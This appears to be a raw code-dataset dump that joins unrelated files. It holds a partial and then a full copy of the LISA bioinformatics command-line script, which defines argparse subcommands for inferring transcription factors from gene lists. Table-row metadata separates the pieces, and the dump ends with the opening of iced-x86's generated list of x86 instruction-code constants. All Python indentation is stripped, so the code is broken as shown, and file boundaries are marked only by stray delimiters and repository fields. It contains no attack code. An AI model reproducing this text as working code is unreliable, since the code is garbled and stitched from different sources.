install_data_parser.set_defaults(func = install_data)
#____ LISA run tests command ___
test_parser = subparsers.add_parser('run-tests')
test_parser.add_argument('species', type = str, choices=['hg38','mm10'])
test_parser.add_argument('test_genelist', type = confirm_file, help = 'test genelist for oneshot command')
test_parser.add_argument('background_genelist', type = confirm_file, help = 'background genelist for oneshot command')
test_parser.add_argument('genelists', nargs = '+', type = str, help = 'genelists for testing multi and one-vs-rest commands')
test_parser.add_argument('--skip_oneshot', action='store_true')
args = parser.parse_args()
test_parser.set_defaults(func = run_tests)
def main():
#____ Execute commands ___
args = parser.parse_args()
try:
args.func #first try accessing the .func attribute, which is empty if user tries ">>>lisa". In this case, don't throw error, display help!
except AttributeError:
print(parser.print_help(), file = sys.stderr)
else:
try:
args.func(args)
except (AssertionError, DownloadRequiredError, DatasetNotFoundError, MultiError) as err:
print('ERROR: ' + str(err), file = sys.stderr)
sys.exit(1) | 48.029289 | 301 | 0.728548 |
from lisa import FromRegions, FromGenes, FromCoverage
from lisa.core.utils import Log
from lisa.core.lisa_core import DownloadRequiredError
from lisa.core.data_interface import DatasetNotFoundError, INSTALL_PATH
from lisa._version import __version__
import configparser
import argparse
import os
import sys
import json
from collections import defaultdict
from shutil import copyfile
import lisa.cli.test_cli as tests
from shutil import copyfile
import numpy as np
from lisa.lisa_public_data.genes_test import _config as public_config
from lisa.lisa_user_data.regions_test import _config as user_config
from lisa.core.io import parse_deseq_file
INSTANTIATION_KWARGS = ['isd_method','verbose','assays', 'rp_map']
PREDICTION_KWARGS = ['background_list','num_background_genes','background_strategy', 'seed']
def extract_kwargs(args, keywords):
return {key : vars(args)[key] for key in keywords}
def is_valid_prefix(prefix):
if '/' in prefix:
if os.path.isdir(prefix) or os.path.isfile(prefix) or os.path.isdir(os.path.dirname(prefix)):
return prefix
else:
raise argparse.ArgumentTypeError('{}: Invalid file prefix.'.format(prefix))
else:
return prefix
def save_results(args, results, metadata):
if args.save_metadata:
if args.output_prefix:
metadata_filename = args.output_prefix + '.metadata.json'
else:
metadata_filename = os.path.basename(args.query_list.name) + '.metadata.json'
with open(metadata_filename, 'w') as f:
f.write(json.dumps(metadata, indent=4))
if not args.output_prefix is None:
with open(args.output_prefix + '.lisa.tsv', 'w') as f:
f.write(results.to_tsv())
else:
print(results.to_tsv())
def lisa_oneshot(args):
try:
args.background_list = args.background_list.readlines()
except AttributeError:
pass
results, metadata = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS)).predict(args.query_list.readlines(), **extract_kwargs(args, PREDICTION_KWARGS))
save_results(args, results, metadata)
def lisa_regions(args):
try:
args.background_list = args.background_list.readlines()
except AttributeError:
pass
if not args.macs_xls:
fn = FromRegions.using_bedfile
else:
fn = FromRegions.using_macs_output
results, metadata = fn(args.species, args.query_genes, args.regions, rp_map = args.rp_map,
rp_decay=args.rp_decay, isd_method=args.isd_method, background_list=args.background_list,
background_strategy=args.background_strategy, num_background_genes = args.num_background_genes,
seed=args.seed, header = args.header)
save_results(args, results, metadata)
def lisa_coverage(args):
try:
args.background_list = args.background_list.readlines()
except AttributeError:
pass
results, metadata = FromCoverage.using_bigwig(args.species, args.query_genes, args.bigwig_path, rp_map = args.rp_map,
isd_method=args.isd_method, background_list=args.background_list,
background_strategy=args.background_strategy, num_background_genes = args.num_background_genes,
seed=args.seed)
save_results(args, results, metadata)
def save_and_get_top_TFs(args, query_name, results, metadata):
with open(args.output_prefix + query_name + '.lisa.tsv', 'w') as f:
f.write(results.to_tsv())
if args.save_metadata:
with open(args.output_prefix + query_name + '.metadata.json', 'w') as f:
f.write(json.dumps(metadata, indent=4))
top_TFs = results.to_dict()['factor']
return list(set(top_TFs[:10]))
def print_results_multi(results_summary):
print('Sample\tTop Regulatory Factors:')
for result_line in results_summary:
print(result_line[0], ', '.join(result_line[1]), sep = '\t')
class MultiError(Exception):
pass
def lisa_multi(args):
log = Log(target = sys.stderr, verbose = args.verbose)
lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
query_dict = {os.path.basename(query.name) : query.readlines() for query in args.query_lists}
results_summary = []
all_passed = True
for query_name, query_list in query_dict.items():
with log.section('Modeling {}:'.format(str(query_name))):
try:
results, metadata = lisa.predict(query_list, **extract_kwargs(args, PREDICTION_KWARGS))
top_TFs_unique = save_and_get_top_TFs(args, query_name, results, metadata)
results_summary.append((query_name, top_TFs_unique))
except AssertionError as err:
all_passed = False
log.append('ERROR: ' + str(err))
print_results_multi(results_summary)
if not all_passed:
raise MultiError('One or more genelists raised an error')
def lisa_deseq(args):
log = Log(target = sys.stderr, verbose = args.verbose)
lisa = FromGenes(args.species, **extract_kwargs(args, INSTANTIATION_KWARGS), log = log)
up_genes, down_genes = parse_deseq_file(args.deseq_file, lfc_cutoff = args.lfc_cutoff,
pval_cutoff= args.pval_cutoff, sep = args.sep)
results_summary = []
all_passed = True
for prefix, query_list in zip(['up-regulated', 'down-regulated'], [up_genes, down_genes]):
with log.section('Modeling {}:'.format(str(prefix))):
try:
results, metadata = lisa.predict(query_list, **extract_kwargs(args, PREDICTION_KWARGS))
top_TFs_unique = save_and_get_top_TFs(args, prefix, results, metadata)
results_summary.append((prefix, top_TFs_unique))
except AssertionError as err:
all_passed = False
log.append('ERROR: ' + str(err))
print_results_multi(results_summary)
if not all_passed:
raise MultiError('One or more genelists raised an error')
def confirm_file(arg):
if os.path.isfile(arg):
return arg
else:
raise argparse.ArgumentTypeError('ERROR: {} is not a valid file'.format(str(arg)))
def run_tests(args):
if not args.skip_oneshot:
tests.test_oneshot(args.test_genelist, args.background_genelist)
tests.test_multi(args.genelists)
def build_common_args(parser):
parser.add_argument('--seed', type = int, default = 2556, help = 'Random seed for gene selection. Allows for reproducing exact results.')
parser.add_argument('--use_motifs', action = 'store_const', const = 'motifs', default='chipseq',
dest = 'isd_method', help = 'Use motif hits instead of ChIP-seq peaks to represent TF binding (only recommended if TF-of-interest is not represented in ChIP-seq database).')
parser.add_argument('--save_metadata', action = 'store_true', default = False, help = 'Save json-formatted metadata from processing each gene list.')
def build_from_genes_args(parser, add_assays = True):
if add_assays:
parser.add_argument('-a','--assays',nargs='+',default=['Direct','H3K27ac','DNase'], choices=['Direct','H3K27ac','DNase'], help = 'Which set of insilico-deletion assays to run.')
parser.add_argument('--rp_map_style', dest = 'rp_map', choices=public_config.get('lisa_params','rp_map_styles').split(','),
default= public_config.get('lisa_params','rp_map_styles').split(',')[0], help = 'Which style of rp_map to assess influence of regions on genes. "basic" is stricly distance-based, while "enhanced" masks the exon and promoter regions of nearby genes.')
def build_multiple_lists_args(parser):
parser.add_argument('-o','--output_prefix', required = True, type = is_valid_prefix, help = 'Output file prefix.')
parser.add_argument('-v','--verbose',type = int, default = 2)
parser.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
help = 'Number of sampled background genes to compare to user-supplied genes. These genes are selection from other gene lists.')
parser.add_argument('--random_background', action = 'store_const', const = 'random', default = 'regulatory', dest = 'background_strategy', help = 'Use random background selection rather than "regulatory" selection.')
def build_one_list_args(parser, default_background_strategy = 'regulatory'):
parser.add_argument('-o','--output_prefix', required = False, type = is_valid_prefix, help = 'Output file prefix. If left empty, will write results to stdout.')
parser.add_argument('--background_strategy', choices = public_config.get('lisa_params', 'background_strategies').split(','),
default = default_background_strategy,
help = """Background genes selection strategy. LISA samples background genes to compare to user\'s genes-of-interest from a diverse
regulatory background (regulatory - recommended), randomly from all genes (random), or uses a user-provided list (provided).
""")
background_genes_group = parser.add_mutually_exclusive_group()
background_genes_group.add_argument('--background_list', type = argparse.FileType('r', encoding = 'utf-8'), required = False,
help = 'user-supplied list of backgroung genes. Used when --background_strategy flag is set to "provided"')
background_genes_group.add_argument('-b','--num_background_genes', type = int, default = public_config.get('lisa_params', 'background_genes'),
help = 'Number of sampled background genes to compare to user-supplied genes')
parser.add_argument('-v','--verbose',type = int, default = 4)
def build_deseq_args(parser):
parser.add_argument('deseq_file', type = confirm_file, help = 'DEseq differential expression output file. Will be parsed for differentially up and down-regulated genes.')
parser.add_argument('-lfc','--lfc_cutoff', type = float, default = 1, help = 'Log2 fold-change cutoff. For up-regulated genes, must have LFC > cutoff. For down-regulated genes, less than -1 * cutoff. Default of 1 means genes must be up or down-regulated by a factor of 2 to be included in query.')
parser.add_argument('-p','--pval_cutoff', type = float, default = 0.1, help = 'Adjusted p-value cutoff. Gene must have pval below cutoff to be a query gene.')
parser.add_argument('--sep', type = str, default='\t', help = 'Field separator for DESeq output file.')
class RstFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter):
pass
parser = argparse.ArgumentParser(
formatter_class=RstFormatter,
description =
"""
Lisa: inferring transcriptional regulators through integrative modeling of public chromatin accessibility and ChIP-seq data
https://genomebiology.biomedcentral.com/articles/10.1186/s13059-020-1934-6
X. Shirley Liu Lab, 2020
""")
parser.add_argument('--version', action = 'version', version = __version__)
subparsers = parser.add_subparsers(help = 'commands')
#__ LISA oneshot command __
oneshot_parser = subparsers.add_parser('oneshot', formatter_class=RstFormatter, description = '''
lisa oneshot
------------
You have:
* one genelist
Use LISA to infer influential TFs from one gene list, with background epigenetic landscape modeled using public data.
If you have multiple lists, this option will be slower than using "multi" due to data-loading time. \n
Example::
$ lisa oneshot hg38 ./genelist.txt -b 501 --seed=2556 --save_metadata > results.tsv
''')
oneshot_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
oneshot_parser.add_argument('query_list', type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_one_list_args(oneshot_parser)
build_from_genes_args(oneshot_parser)
build_common_args(oneshot_parser)
oneshot_parser.set_defaults(func = lisa_oneshot)
deseq_parser = subparsers.add_parser('deseq', formatter_class = RstFormatter, description = '''
lisa deseq
----------
You have:
* RNA-seq differential expression results from DESeq2
Use LISA to infer influential TFs given differentially expressed genes found using DESeq2. Will seperate up-regulated and down-regulated genes into their own LISA tests.
Example::
$ lisa deseq hg38 ./deseq_results.tsv -o deseq/ -b 501 --seed=2556 --save_metadata
''')
deseq_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
build_deseq_args(deseq_parser)
build_multiple_lists_args(deseq_parser)
build_from_genes_args(deseq_parser)
build_common_args(deseq_parser)
deseq_parser.set_defaults(func = lisa_deseq, background_list = None)
#__ LISA multi command __
multi_parser = subparsers.add_parser('multi', formatter_class=RstFormatter, description = '''
lisa multi
----------
You have:
* multiple genelists
Use LISA to infer influential TFs from multiple lists. This function processes each genelist independently in the same manner as the "oneshot" command, but reduces data loading time. Useful when performing
the test on up and down-regulated genes from multiple RNA-seq clusters.
Example::
$ lisa multi hg38 ./genelists/*.txt -b 501 -o ./results/
''')
multi_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
multi_parser.add_argument('query_lists', type = argparse.FileType('r', encoding = 'utf-8'), nargs = "+", help = 'user-supplied gene lists. One gene per line in either symbol or refseqID format')
build_multiple_lists_args(multi_parser)
build_from_genes_args(multi_parser)
build_common_args(multi_parser)
multi_parser.set_defaults(func = lisa_multi, background_list = None)
from argparse import SUPPRESS
#____ LISA regions command ____
regions_parser = subparsers.add_parser('regions', formatter_class=RstFormatter, add_help = False, description = '''
lisa regions
------------
You have:
* one genelist
* regions (250 - 1000 bp wide) of interest related to that list
* optional: a positive score/weight associated with each region (you may pass zero-weight regions, but they do not affect the test and will be filtered out)
Use LISA to infer TF influence on your geneset, but provide your regions-of-interest rather than building a background epigenetic model using public data. When providing
your own regions, LISA uses higher resolution, more precise binding data to increase the power of the test. Your regions should be between ~250 and 1000 bp in width, and the
associated score should be positive. Scores are often read-depth at those regions, but can be any metic you think may influence gene regulation.
Example::
$ lisa regions -r ./regions.bed -q ./genelist.txt --save_metadata > results.tsv
$ lisa regions -r ./macs_peaks.xls -q ./genelist.txt --macs_xls > results.tsv
''')
regions_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
regions_required = regions_parser.add_argument_group('required arguments')
regions_required.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
regions_required.add_argument('-r', '--regions', type = confirm_file, required = True, help = 'Tad-delineated bed file with columns: chr, start, end[, score]. The score column is optional. If not provided, LISA will assign each region a uniform weight.')
regions_optional = regions_parser.add_argument_group('optional arguments')
regions_optional.add_argument('--header', action = 'store_true', default=False, help = 'Bed file has header row as first row. The header row may contain ')
regions_optional.add_argument('--macs_xls', action = 'store_true', default=False, help='If provided, regions file is a MACS2 .xls output file, and the "pileup" field is taken to be the region score.')
regions_optional.add_argument('--rp_map_style', dest = 'rp_map', choices=user_config.get('lisa_params','rp_map_styles').split(','),
default=user_config.get('lisa_params','rp_map_styles').split(',')[0])
regions_optional.add_argument('--rp_decay', type = int, default = user_config.get('lisa_params','rp_decay'),
help = 'Distance in base-pairs in which the influence of a region on a gene decays by half. Increase for more weight on distal elements, decrease for more weight on promoter elements.')
build_one_list_args(regions_optional, default_background_strategy='all')
build_common_args(regions_optional)
regions_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
regions_parser.set_defaults(func = lisa_regions)
#___ LISA coverage commands _____
coverage_parser = subparsers.add_parser('coverage', formatter_class = RstFormatter, add_help = False, description = '''
lisa coverage
------------
You have:
* one genelist
* bigwig of coverage over the genome
Use LISA to infer TF influence on your geneset using your own coverage data. This test is better suited than the "regions" test when your measure produces wide peaks/areas of influence.
An example of this is H3K27ac data, which correlates with gene expression similarly to accessibility, but produces wide peaks that may span many distinct TF binding locations.
Example::
$ lisa coverage -bw ./sample.bigwig -q ./genelist.txt --save_metadata > results.tsv
''')
coverage_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Find TFs associated with human (hg38) or mouse (mm10) genes')
coverage_parser.add_argument('-q', '--query_genes', required = True, type = argparse.FileType('r', encoding = 'utf-8'), help = 'user-supplied gene list. One gene per line in either symbol or refseqID format')
coverage_parser.add_argument('-bw', '--bigwig_path', type = confirm_file, required = True, help = 'Bigwig file describing coverage over the genome.')
coverage_optional = coverage_parser.add_argument_group('optional arguments')
build_from_genes_args(coverage_optional, False)
build_one_list_args(coverage_optional, default_background_strategy='all')
build_common_args(coverage_optional)
coverage_optional.add_argument('-h', '--help', action = 'help', default=SUPPRESS)
coverage_parser.set_defaults(func = lisa_coverage)
#__ download command ___
def lisa_download(args):
if args.command in ['oneshot','multi','coverage']:
_class = FromGenes
elif args.command == 'regions':
_class = FromRegions
else:
raise AssertionError('Command {} not recognized'.format(args.command))
if args.url:
print(_class.get_dataset_url(args.species))
else:
_class.download_dataset(args.species)
download_data_parser = subparsers.add_parser('download', description = 'Download data from CistromeDB. Use if data recieved is incomplete or malformed.')
download_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Download data associated with human (hg38) or mouse (mm10) genes')
download_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to download data')
download_data_parser.add_argument('--url', action = 'store_true', help = 'Get url for data download. Does not install data.')
download_data_parser.set_defaults(func = lisa_download)
#__ install command ___
def install_data(args):
if args.command in ['oneshot','multi','coverage']:
_class = FromGenes
elif args.command == 'regions':
_class = FromRegions
else:
raise AssertionError('Command {} not recognized'.format(args.command))
dataset_file_required = os.path.basename(_class.get_dataset_path(args.species))
if not args.force:
assert(dataset_file_required == os.path.basename(args.dataset)), 'The {} test requires dataset {}. Use --force to overide and install your own dataset.'.format(args.command, dataset_file_required)
if not os.path.isdir(INSTALL_PATH):
os.mkdir(INSTALL_PATH)
if args.remove:
os.rename(args.dataset, _class.get_dataset_path(args.species))
else:
copyfile(args.dataset, _class.get_dataset_path(args.species))
install_data_parser = subparsers.add_parser('install', description = 'Helper command for manually installing Lisa\'s data')
install_data_parser.add_argument('species', choices = ['hg38','mm10'], help = 'Install data associated with human (hg38) or mouse (mm10) genes')
install_data_parser.add_argument('command', choices=['oneshot', 'multi', 'regions', 'coverage'], help = 'For which command to install data')
install_data_parser.add_argument('dataset', type = confirm_file, help = 'Path to downloaded h5 dataset')
install_data_parser.add_argument('--remove', action = 'store_true', help = 'Delete dataset after installation is complete.')
install_data_parser.add_argument('--force', action = 'store_true', help = 'Skip namecheck and install lisa custom dataset')
install_data_parser.set_defaults(func = install_data)
test_parser = subparsers.add_parser('run-tests')
test_parser.add_argument('species', type = str, choices=['hg38','mm10'])
test_parser.add_argument('test_genelist', type = confirm_file, help = 'test genelist for oneshot command')
test_parser.add_argument('background_genelist', type = confirm_file, help = 'background genelist for oneshot command')
test_parser.add_argument('genelists', nargs = '+', type = str, help = 'genelists for testing multi and one-vs-rest commands')
test_parser.add_argument('--skip_oneshot', action='store_true')
args = parser.parse_args()
test_parser.set_defaults(func = run_tests)
def main():
args = parser.parse_args()
try:
args.func
except AttributeError:
print(parser.print_help(), file = sys.stderr)
else:
try:
args.func(args)
except (AssertionError, DownloadRequiredError, DatasetNotFoundError, MultiError) as err:
print('ERROR: ' + str(err), file = sys.stderr)
sys.exit(1) | true | true |
f725f58bf735ca99258ae36b96512040ca305b63 | 608,328 | py | Python | src/rust/iced-x86-py/src/iced_x86/Code.py | woodruffw-forks/iced | cf23473cf26cd7215dee7510093fad140c696cc7 | [
"MIT"
] | 1 | 2021-06-10T15:26:22.000Z | 2021-06-10T15:26:22.000Z | src/rust/iced-x86-py/src/iced_x86/Code.py | paulfariello/iced | 08f663ae9626b05ab08ad36dd5143f94aed365b6 | [
"MIT"
] | null | null | null | src/rust/iced-x86-py/src/iced_x86/Code.py | paulfariello/iced | 08f663ae9626b05ab08ad36dd5143f94aed365b6 | [
"MIT"
] | null | null | null | # SPDX-License-Identifier: MIT
# Copyright (C) 2018-present iced project and contributors
# ⚠️This file was generated by GENERATOR!🦹♂️
# pylint: disable=invalid-name
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
"""
x86 instruction code
"""
INVALID: int = 0
"""
It's an invalid instruction, eg. it's a new unknown instruction, garbage or there's not enough bytes to decode the instruction etc.
"""
DECLAREBYTE: int = 1
"""
A ``db``/``.byte`` asm directive that can store 1-16 bytes
"""
DECLAREWORD: int = 2
"""
A ``dw``/``.word`` asm directive that can store 1-8 words
"""
DECLAREDWORD: int = 3
"""
A ``dd``/``.int`` asm directive that can store 1-4 dwords
"""
DECLAREQWORD: int = 4
"""
A ``dq``/``.quad`` asm directive that can store 1-2 qwords
"""
ADD_RM8_R8: int = 5
"""
``ADD r/m8, r8``
``00 /r``
``8086+``
``16/32/64-bit``
"""
ADD_RM16_R16: int = 6
"""
``ADD r/m16, r16``
``o16 01 /r``
``8086+``
``16/32/64-bit``
"""
ADD_RM32_R32: int = 7
"""
``ADD r/m32, r32``
``o32 01 /r``
``386+``
``16/32/64-bit``
"""
ADD_RM64_R64: int = 8
"""
``ADD r/m64, r64``
``o64 01 /r``
``X64``
``64-bit``
"""
ADD_R8_RM8: int = 9
"""
``ADD r8, r/m8``
``02 /r``
``8086+``
``16/32/64-bit``
"""
ADD_R16_RM16: int = 10
"""
``ADD r16, r/m16``
``o16 03 /r``
``8086+``
``16/32/64-bit``
"""
ADD_R32_RM32: int = 11
"""
``ADD r32, r/m32``
``o32 03 /r``
``386+``
``16/32/64-bit``
"""
ADD_R64_RM64: int = 12
"""
``ADD r64, r/m64``
``o64 03 /r``
``X64``
``64-bit``
"""
ADD_AL_IMM8: int = 13
"""
``ADD AL, imm8``
``04 ib``
``8086+``
``16/32/64-bit``
"""
ADD_AX_IMM16: int = 14
"""
``ADD AX, imm16``
``o16 05 iw``
``8086+``
``16/32/64-bit``
"""
ADD_EAX_IMM32: int = 15
"""
``ADD EAX, imm32``
``o32 05 id``
``386+``
``16/32/64-bit``
"""
ADD_RAX_IMM32: int = 16
"""
``ADD RAX, imm32``
``o64 05 id``
``X64``
``64-bit``
"""
PUSHW_ES: int = 17
"""
``PUSH ES``
``o16 06``
``8086+``
``16/32-bit``
"""
PUSHD_ES: int = 18
"""
``PUSH ES``
``o32 06``
``386+``
``16/32-bit``
"""
POPW_ES: int = 19
"""
``POP ES``
``o16 07``
``8086+``
``16/32-bit``
"""
POPD_ES: int = 20
"""
``POP ES``
``o32 07``
``386+``
``16/32-bit``
"""
OR_RM8_R8: int = 21
"""
``OR r/m8, r8``
``08 /r``
``8086+``
``16/32/64-bit``
"""
OR_RM16_R16: int = 22
"""
``OR r/m16, r16``
``o16 09 /r``
``8086+``
``16/32/64-bit``
"""
OR_RM32_R32: int = 23
"""
``OR r/m32, r32``
``o32 09 /r``
``386+``
``16/32/64-bit``
"""
OR_RM64_R64: int = 24
"""
``OR r/m64, r64``
``o64 09 /r``
``X64``
``64-bit``
"""
OR_R8_RM8: int = 25
"""
``OR r8, r/m8``
``0A /r``
``8086+``
``16/32/64-bit``
"""
OR_R16_RM16: int = 26
"""
``OR r16, r/m16``
``o16 0B /r``
``8086+``
``16/32/64-bit``
"""
OR_R32_RM32: int = 27
"""
``OR r32, r/m32``
``o32 0B /r``
``386+``
``16/32/64-bit``
"""
OR_R64_RM64: int = 28
"""
``OR r64, r/m64``
``o64 0B /r``
``X64``
``64-bit``
"""
OR_AL_IMM8: int = 29
"""
``OR AL, imm8``
``0C ib``
``8086+``
``16/32/64-bit``
"""
OR_AX_IMM16: int = 30
"""
``OR AX, imm16``
``o16 0D iw``
``8086+``
``16/32/64-bit``
"""
OR_EAX_IMM32: int = 31
"""
``OR EAX, imm32``
``o32 0D id``
``386+``
``16/32/64-bit``
"""
OR_RAX_IMM32: int = 32
"""
``OR RAX, imm32``
``o64 0D id``
``X64``
``64-bit``
"""
PUSHW_CS: int = 33
"""
``PUSH CS``
``o16 0E``
``8086+``
``16/32-bit``
"""
PUSHD_CS: int = 34
"""
``PUSH CS``
``o32 0E``
``386+``
``16/32-bit``
"""
POPW_CS: int = 35
"""
``POP CS``
``o16 0F``
``8086``
``16-bit``
"""
ADC_RM8_R8: int = 36
"""
``ADC r/m8, r8``
``10 /r``
``8086+``
``16/32/64-bit``
"""
ADC_RM16_R16: int = 37
"""
``ADC r/m16, r16``
``o16 11 /r``
``8086+``
``16/32/64-bit``
"""
ADC_RM32_R32: int = 38
"""
``ADC r/m32, r32``
``o32 11 /r``
``386+``
``16/32/64-bit``
"""
ADC_RM64_R64: int = 39
"""
``ADC r/m64, r64``
``o64 11 /r``
``X64``
``64-bit``
"""
ADC_R8_RM8: int = 40
"""
``ADC r8, r/m8``
``12 /r``
``8086+``
``16/32/64-bit``
"""
ADC_R16_RM16: int = 41
"""
``ADC r16, r/m16``
``o16 13 /r``
``8086+``
``16/32/64-bit``
"""
ADC_R32_RM32: int = 42
"""
``ADC r32, r/m32``
``o32 13 /r``
``386+``
``16/32/64-bit``
"""
ADC_R64_RM64: int = 43
"""
``ADC r64, r/m64``
``o64 13 /r``
``X64``
``64-bit``
"""
ADC_AL_IMM8: int = 44
"""
``ADC AL, imm8``
``14 ib``
``8086+``
``16/32/64-bit``
"""
ADC_AX_IMM16: int = 45
"""
``ADC AX, imm16``
``o16 15 iw``
``8086+``
``16/32/64-bit``
"""
ADC_EAX_IMM32: int = 46
"""
``ADC EAX, imm32``
``o32 15 id``
``386+``
``16/32/64-bit``
"""
ADC_RAX_IMM32: int = 47
"""
``ADC RAX, imm32``
``o64 15 id``
``X64``
``64-bit``
"""
PUSHW_SS: int = 48
"""
``PUSH SS``
``o16 16``
``8086+``
``16/32-bit``
"""
PUSHD_SS: int = 49
"""
``PUSH SS``
``o32 16``
``386+``
``16/32-bit``
"""
POPW_SS: int = 50
"""
``POP SS``
``o16 17``
``8086+``
``16/32-bit``
"""
POPD_SS: int = 51
"""
``POP SS``
``o32 17``
``386+``
``16/32-bit``
"""
SBB_RM8_R8: int = 52
"""
``SBB r/m8, r8``
``18 /r``
``8086+``
``16/32/64-bit``
"""
SBB_RM16_R16: int = 53
"""
``SBB r/m16, r16``
``o16 19 /r``
``8086+``
``16/32/64-bit``
"""
SBB_RM32_R32: int = 54
"""
``SBB r/m32, r32``
``o32 19 /r``
``386+``
``16/32/64-bit``
"""
SBB_RM64_R64: int = 55
"""
``SBB r/m64, r64``
``o64 19 /r``
``X64``
``64-bit``
"""
SBB_R8_RM8: int = 56
"""
``SBB r8, r/m8``
``1A /r``
``8086+``
``16/32/64-bit``
"""
SBB_R16_RM16: int = 57
"""
``SBB r16, r/m16``
``o16 1B /r``
``8086+``
``16/32/64-bit``
"""
SBB_R32_RM32: int = 58
"""
``SBB r32, r/m32``
``o32 1B /r``
``386+``
``16/32/64-bit``
"""
SBB_R64_RM64: int = 59
"""
``SBB r64, r/m64``
``o64 1B /r``
``X64``
``64-bit``
"""
SBB_AL_IMM8: int = 60
"""
``SBB AL, imm8``
``1C ib``
``8086+``
``16/32/64-bit``
"""
SBB_AX_IMM16: int = 61
"""
``SBB AX, imm16``
``o16 1D iw``
``8086+``
``16/32/64-bit``
"""
SBB_EAX_IMM32: int = 62
"""
``SBB EAX, imm32``
``o32 1D id``
``386+``
``16/32/64-bit``
"""
SBB_RAX_IMM32: int = 63
"""
``SBB RAX, imm32``
``o64 1D id``
``X64``
``64-bit``
"""
PUSHW_DS: int = 64
"""
``PUSH DS``
``o16 1E``
``8086+``
``16/32-bit``
"""
PUSHD_DS: int = 65
"""
``PUSH DS``
``o32 1E``
``386+``
``16/32-bit``
"""
POPW_DS: int = 66
"""
``POP DS``
``o16 1F``
``8086+``
``16/32-bit``
"""
POPD_DS: int = 67
"""
``POP DS``
``o32 1F``
``386+``
``16/32-bit``
"""
AND_RM8_R8: int = 68
"""
``AND r/m8, r8``
``20 /r``
``8086+``
``16/32/64-bit``
"""
AND_RM16_R16: int = 69
"""
``AND r/m16, r16``
``o16 21 /r``
``8086+``
``16/32/64-bit``
"""
AND_RM32_R32: int = 70
"""
``AND r/m32, r32``
``o32 21 /r``
``386+``
``16/32/64-bit``
"""
AND_RM64_R64: int = 71
"""
``AND r/m64, r64``
``o64 21 /r``
``X64``
``64-bit``
"""
AND_R8_RM8: int = 72
"""
``AND r8, r/m8``
``22 /r``
``8086+``
``16/32/64-bit``
"""
AND_R16_RM16: int = 73
"""
``AND r16, r/m16``
``o16 23 /r``
``8086+``
``16/32/64-bit``
"""
AND_R32_RM32: int = 74
"""
``AND r32, r/m32``
``o32 23 /r``
``386+``
``16/32/64-bit``
"""
AND_R64_RM64: int = 75
"""
``AND r64, r/m64``
``o64 23 /r``
``X64``
``64-bit``
"""
AND_AL_IMM8: int = 76
"""
``AND AL, imm8``
``24 ib``
``8086+``
``16/32/64-bit``
"""
AND_AX_IMM16: int = 77
"""
``AND AX, imm16``
``o16 25 iw``
``8086+``
``16/32/64-bit``
"""
AND_EAX_IMM32: int = 78
"""
``AND EAX, imm32``
``o32 25 id``
``386+``
``16/32/64-bit``
"""
AND_RAX_IMM32: int = 79
"""
``AND RAX, imm32``
``o64 25 id``
``X64``
``64-bit``
"""
DAA: int = 80
"""
``DAA``
``27``
``8086+``
``16/32-bit``
"""
SUB_RM8_R8: int = 81
"""
``SUB r/m8, r8``
``28 /r``
``8086+``
``16/32/64-bit``
"""
SUB_RM16_R16: int = 82
"""
``SUB r/m16, r16``
``o16 29 /r``
``8086+``
``16/32/64-bit``
"""
SUB_RM32_R32: int = 83
"""
``SUB r/m32, r32``
``o32 29 /r``
``386+``
``16/32/64-bit``
"""
SUB_RM64_R64: int = 84
"""
``SUB r/m64, r64``
``o64 29 /r``
``X64``
``64-bit``
"""
SUB_R8_RM8: int = 85
"""
``SUB r8, r/m8``
``2A /r``
``8086+``
``16/32/64-bit``
"""
SUB_R16_RM16: int = 86
"""
``SUB r16, r/m16``
``o16 2B /r``
``8086+``
``16/32/64-bit``
"""
SUB_R32_RM32: int = 87
"""
``SUB r32, r/m32``
``o32 2B /r``
``386+``
``16/32/64-bit``
"""
SUB_R64_RM64: int = 88
"""
``SUB r64, r/m64``
``o64 2B /r``
``X64``
``64-bit``
"""
SUB_AL_IMM8: int = 89
"""
``SUB AL, imm8``
``2C ib``
``8086+``
``16/32/64-bit``
"""
SUB_AX_IMM16: int = 90
"""
``SUB AX, imm16``
``o16 2D iw``
``8086+``
``16/32/64-bit``
"""
SUB_EAX_IMM32: int = 91
"""
``SUB EAX, imm32``
``o32 2D id``
``386+``
``16/32/64-bit``
"""
SUB_RAX_IMM32: int = 92
"""
``SUB RAX, imm32``
``o64 2D id``
``X64``
``64-bit``
"""
DAS: int = 93
"""
``DAS``
``2F``
``8086+``
``16/32-bit``
"""
XOR_RM8_R8: int = 94
"""
``XOR r/m8, r8``
``30 /r``
``8086+``
``16/32/64-bit``
"""
XOR_RM16_R16: int = 95
"""
``XOR r/m16, r16``
``o16 31 /r``
``8086+``
``16/32/64-bit``
"""
XOR_RM32_R32: int = 96
"""
``XOR r/m32, r32``
``o32 31 /r``
``386+``
``16/32/64-bit``
"""
XOR_RM64_R64: int = 97
"""
``XOR r/m64, r64``
``o64 31 /r``
``X64``
``64-bit``
"""
XOR_R8_RM8: int = 98
"""
``XOR r8, r/m8``
``32 /r``
``8086+``
``16/32/64-bit``
"""
XOR_R16_RM16: int = 99
"""
``XOR r16, r/m16``
``o16 33 /r``
``8086+``
``16/32/64-bit``
"""
XOR_R32_RM32: int = 100
"""
``XOR r32, r/m32``
``o32 33 /r``
``386+``
``16/32/64-bit``
"""
XOR_R64_RM64: int = 101
"""
``XOR r64, r/m64``
``o64 33 /r``
``X64``
``64-bit``
"""
XOR_AL_IMM8: int = 102
"""
``XOR AL, imm8``
``34 ib``
``8086+``
